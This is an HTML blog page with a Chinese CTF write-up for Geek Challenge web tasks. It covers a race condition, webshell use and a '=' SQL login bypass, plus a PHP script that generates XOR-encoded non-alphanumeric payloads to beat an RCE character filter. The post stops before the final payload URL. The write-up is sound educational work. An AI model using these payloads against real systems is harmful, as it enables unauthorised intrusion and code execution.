<!DOCTYPE html>





<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
<meta name="google-site-verification" content="1uZMCN0i5SDbQXPraoH4-XPXaCXeXjKFYdK5hjYLSWU" />
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.0" color="#222">
  <link rel="alternate" href="/atom.xml" title="AssCreed" type="application/atom+xml">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">

<link rel="stylesheet" href="/css/main.css?v=7.4.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">
  <link rel="stylesheet" href="/lib/pace/pace-theme-loading-bar.min.css?v=1.0.2">
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '7.4.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":"default"},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: '复制',
      copy_success: '复制成功',
      copy_failure: '复制失败'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="题目很有意思.比赛地址:http://geek.sycsec.com:44444/challenge/index">
<meta name="keywords" content="PHP,WP">
<meta property="og:type" content="article">
<meta property="og:title" content="第十届极客大挑战Write-up">
<meta property="og:url" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/index.html">
<meta property="og:site_name" content="AssCreed">
<meta property="og:description" content="题目很有意思.比赛地址:http://geek.sycsec.com:44444/challenge/index">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571363272606.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571363339663.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571363481025.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571363676296.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571373932241.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374018594.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571495641219.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374457080.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374537984.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374815419.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374878503.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571374951634.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571375619875.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571376044998.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571375724646.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571375756868.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571375974330.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571386357741.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571387426532.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571387449879.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571495997995.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571497597408.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571499066521.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571499768310.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571498825445.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571499021494.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571500306817.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571501644752.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571502520704.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571502747158.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571502795907.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571503296101.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571503618681.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101124245849.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101124431268.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101125127520.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101201215464.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101202502733.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101202533747.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101203249710.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101203821862.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101204140891.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101204909589.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191101213948365.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031113746614.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031114019083.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031115415135.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031115443975.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031115642982.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031122255387.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191031124114147.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029215131113.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029215545399.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029220046452.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029220217949.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029220337766.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231444787.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231426639.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231626206.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231659829.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231743833.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029231920584.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029232108090.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029232338502.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191029232357758.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191030232940824.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191030233157391.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191030233348553.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191030233555540.png">
<meta property="og:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/image-20191030233648512.png">
<meta property="og:updated_time" content="2019-11-09T02:31:43.880Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="第十届极客大挑战Write-up">
<meta name="twitter:description" content="题目很有意思.比赛地址:http://geek.sycsec.com:44444/challenge/index">
<meta name="twitter:image" content="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/1571363272606.png">
  <link rel="canonical" href="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>第十届极客大挑战Write-up | AssCreed</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">
  <div class="container use-motion">
    <div class="headband"></div>
	<a href="https://github.com/AssCreed" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">AssCreed</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    
      
      
        
      
        
      
        
      
    

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-about">
      
    
      
      
        
      
        
      
        
      
    

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-tags">
      
    
      
      
        
      
        
      
        
          
        
      
    

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签<span class="badge">13</span></a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-categories">
      
    
      
      
        
      
        
          
        
      
        
      
    

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类<span class="badge">1</span></a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    
      
      
        
          
        
      
        
      
        
      
    

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档<span class="badge">7</span></a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-commonweal">
      
    
      
      
        
      
        
      
        
      
    

    <a href="/404/" rel="section"><i class="fa fa-fw fa-heartbeat"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a href="javascript:;" class="popup-trigger">
        
          <i class="fa fa-search fa-fw"></i>搜索</a>
      </li>
    
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
            

          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="AssCreed">
      <meta itemprop="description" content="是时代造就英雄还是英雄造就时代？">
      <meta itemprop="image" content="/images/1.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="AssCreed">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">第十届极客大挑战Write-up

          
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              
                
              

              <time title="创建时间：2019-10-18 09:22:57" itemprop="dateCreated datePublished" datetime="2019-10-18T09:22:57+08:00">2019-10-18</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2019-11-09 10:31:43" itemprop="dateModified" datetime="2019-11-09T10:31:43+08:00">2019-11-09</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
        
      
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2019/10/18/第十届极客大挑战Write-up/#comments" itemprop="discussionUrl"><span class="post-comments-count valine-comment-count" data-xid="/2019/10/18/第十届极客大挑战Write-up/" itemprop="commentCount"></span></a>
  </span>
  
  
          
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="fa fa-file-word-o"></i>
              </span>
              
                <span class="post-meta-item-text">本文字数：</span>
              
              <span>8.9k</span>
            </span>
          
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="fa fa-clock-o"></i>
              </span>
              
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              
              <span>8 分钟</span>
            </span>
          
            <div class="post-description">题目很有意思.比赛地址:http://geek.sycsec.com:44444/challenge/index</div>
          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h2 id="打比赛前先撸一只猫！-猫猫陪我打ctf！"><a href="#打比赛前先撸一只猫！-猫猫陪我打ctf！" class="headerlink" title="打比赛前先撸一只猫！: 猫猫陪我打ctf！"></a>打比赛前先撸一只猫！: 猫猫陪我打ctf！</h2><p>开局一只猫，flag全靠捡 -_-</p><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571363272606.png" alt="1571363272606"></p><p>直接F12 查看源码</p><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571363339663.png" alt="1571363339663"></p><p>直接提交cat=dog</p><figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.25.14.40:8110/?cat=dog</span><br></pre></td></tr></table></figure><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571363481025.png" alt="1571363481025"></p><h2 id="你看见过我的菜刀么"><a href="#你看见过我的菜刀么" class="headerlink" title="你看见过我的菜刀么"></a>你看见过我的菜刀么</h2><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571363676296.png" alt="1571363676296"></p><p>确实是白给的shell</p><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571373932241.png" alt="1571373932241"></p><p>​       根目录下发现flag目录下的flag.txt<br>​<br>​             <img src="/2019/10/18/第十届极客大挑战Write-up/1571374018594.png" alt="1571374018594"><br>​<br>​<br>​    </p><a id="more"></a>











<h2 id="BurpSuiiiiiit-拿起你的burp，开始战斗吧"><a href="#BurpSuiiiiiit-拿起你的burp，开始战斗吧" class="headerlink" title="BurpSuiiiiiit!!!: 拿起你的burp，开始战斗吧"></a>BurpSuiiiiiit!!!: 拿起你的burp，开始战斗吧</h2><p>附件下载下来，解压得到Extender.jar文件</p>
<p>从名字和格式看应该BurpSuit的扩展包，用BP导入</p>
<p>​      <img src="/2019/10/18/第十届极客大挑战Write-up/1571495641219.png" alt="1571495641219"></p>
<p>​      <img src="/2019/10/18/第十届极客大挑战Write-up/1571374457080.png" alt="1571374457080"><br>​<br>​              导入失败，并提示我们查看errors页面<br>​<br>​             <img src="/2019/10/18/第十届极客大挑战Write-up/1571374537984.png" alt="1571374537984"></p>
<p>​        flag直接就出来了</p>
<h2 id="性感潇文清，在线算卦：动作快点才能算到好卦。"><a href="#性感潇文清，在线算卦：动作快点才能算到好卦。" class="headerlink" title="性感潇文清，在线算卦：动作快点才能算到好卦。"></a>性感潇文清，在线算卦：动作快点才能算到好卦。</h2><p>输入姓名和生日后，返回了一个路径</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571374815419.png" alt="1571374815419"></p>
<p>直接访问试下</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571374878503.png" alt="1571374878503"></p>
<p>回到主页，查看源码</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571374951634.png" alt="1571374951634"></p>
<p>提示我们条件竞争，从源码看我们输入u和p后，flag会写入到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$savepath<span class="string">" . sha1($_GET['u'])</span></span><br></pre></td></tr></table></figure>

<p>​        0.1s后再把flag换成 you are too slow</p>
<p>​        所以我们先一直访问存在flag的这个文件，然后在提交u和p，在flag生成的一瞬间把它读取</p>
<p>​        直接上burpsuit</p>
<p>​    <img src="/2019/10/18/第十届极客大挑战Write-up/1571375619875.png" alt="1571375619875"></p>
<p>​    <img src="/2019/10/18/第十届极客大挑战Write-up/1571376044998.png" alt="1571376044998"></p>
<p>​    payload设置为空，数量200个。</p>
<p>​    <img src="/2019/10/18/第十届极客大挑战Write-up/1571375724646.png" alt="1571375724646"></p>
<p>​    <img src="/2019/10/18/第十届极客大挑战Write-up/1571375756868.png" alt="1571375756868"></p>
<p>​    payload同样为空，数量为1.</p>
<p>​    2攻击后，3立马攻击</p>
<p>​    <img src="/2019/10/18/第十届极客大挑战Write-up/1571375974330.png" alt="1571375974330"></p>
<p>​    得到flag</p>
<h2 id="Easysql-最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！"><a href="#Easysql-最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！" class="headerlink" title="Easysql: 最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！"></a>Easysql: 最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！</h2><p><img src="/2019/10/18/第十届极客大挑战Write-up/1571386357741.png" alt="1571386357741"></p>
<p>什么防护都没有 </p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">'='</span><br><span class="line">'='</span><br></pre></td></tr></table></figure>

<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571387426532.png" alt="1571387426532">    </p>
<p>直接进后台</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571387449879.png" alt="1571387449879"></p>
<h2 id="RCE-me-I-don’t-think-U-can-system-RCE-prove-to-me"><a href="#RCE-me-I-don’t-think-U-can-system-RCE-prove-to-me" class="headerlink" title="RCE me: I don’t think U can system RCE, prove to me"></a>RCE me: I don’t think U can system RCE, prove to me</h2><p>这道题学到了很多！</p>
<p>打开网页看看</p>
<p><img src="/2019/10/18/第十届极客大挑战Write-up/1571495997995.png" alt="1571495997995"></p>
<p>GET传参code，code中不能有A-Z，a-z，0-9，这些字符，而且字符限制在40个字符</p>
<p>所以我们要先绕过这个限制，执行命令。</p>
<p>参考<a href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html" target="_blank" rel="noopener">p神</a>不含数字和字母的webshell</p>
<p>构造脚本：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gen</span><span class="params">($pl)</span> </span>&#123;</span><br><span class="line">    $aa = <span class="string">""</span>;</span><br><span class="line">    $bb = <span class="string">""</span>;</span><br><span class="line">    <span class="keyword">for</span> ($j = <span class="number">0</span>; $j &lt; strlen($pl); $j++) &#123;</span><br><span class="line">        <span class="keyword">for</span> ($i = <span class="number">0xa0</span>; $i &lt; <span class="number">0xff</span>; $i++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, chr($i)) == <span class="number">0</span>) &#123;</span><br><span class="line">                $t = chr($i) ^ $pl[$j];</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, $t) == <span class="number">0</span>) &#123;</span><br><span class="line">                    $aa .= chr($i);</span><br><span class="line">                    $bb .= $t;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> str_replace(<span class="string">"%"</span>, <span class="string">"\x"</span>, urlencode($aa) . <span class="string">"^"</span> . urlencode($bb) . <span class="string">"\r\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gen_url</span><span class="params">($pl)</span> </span>&#123;</span><br><span class="line">    $aa = <span class="string">""</span>;</span><br><span class="line">    $bb = <span class="string">""</span>;</span><br><span class="line">    <span class="keyword">for</span> ($j = <span class="number">0</span>; $j &lt; strlen($pl); $j++) &#123;</span><br><span class="line">        <span class="keyword">for</span> ($i = <span class="number">0xa0</span>; $i &lt; <span class="number">0xff</span>; $i++) &#123;</span><br><span class="line">            <span class="keyword">if</span> (preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, chr($i)) == <span class="number">0</span>) &#123;</span><br><span class="line">                $t = chr($i) ^ $pl[$j];</span><br><span class="line">                <span class="keyword">if</span> (preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, $t) == <span class="number">0</span>) &#123;</span><br><span class="line">                    $aa .= chr($i);</span><br><span class="line">                    $bb .= $t;</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> urlencode($aa) . <span class="string">"^"</span> . urlencode($bb). <span class="string">"\r\n"</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> gen(<span class="string">"_GET"</span>);</span><br><span class="line"><span class="keyword">echo</span> gen_url(<span class="string">"_GET"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\xA0\xA0\xA0\xA0"</span>^<span class="string">"\xFF\xE7\xE5\xF4"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span><br><span class="line"><span class="keyword">echo</span> urldecode(<span class="string">"%A0%A0%A0%A0"</span>)^urldecode(<span class="string">"%FF%E7%E5%F4"</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"\n"</span>;</span><br></pre></td></tr></table></figure>

<p>构造如下URl</p>
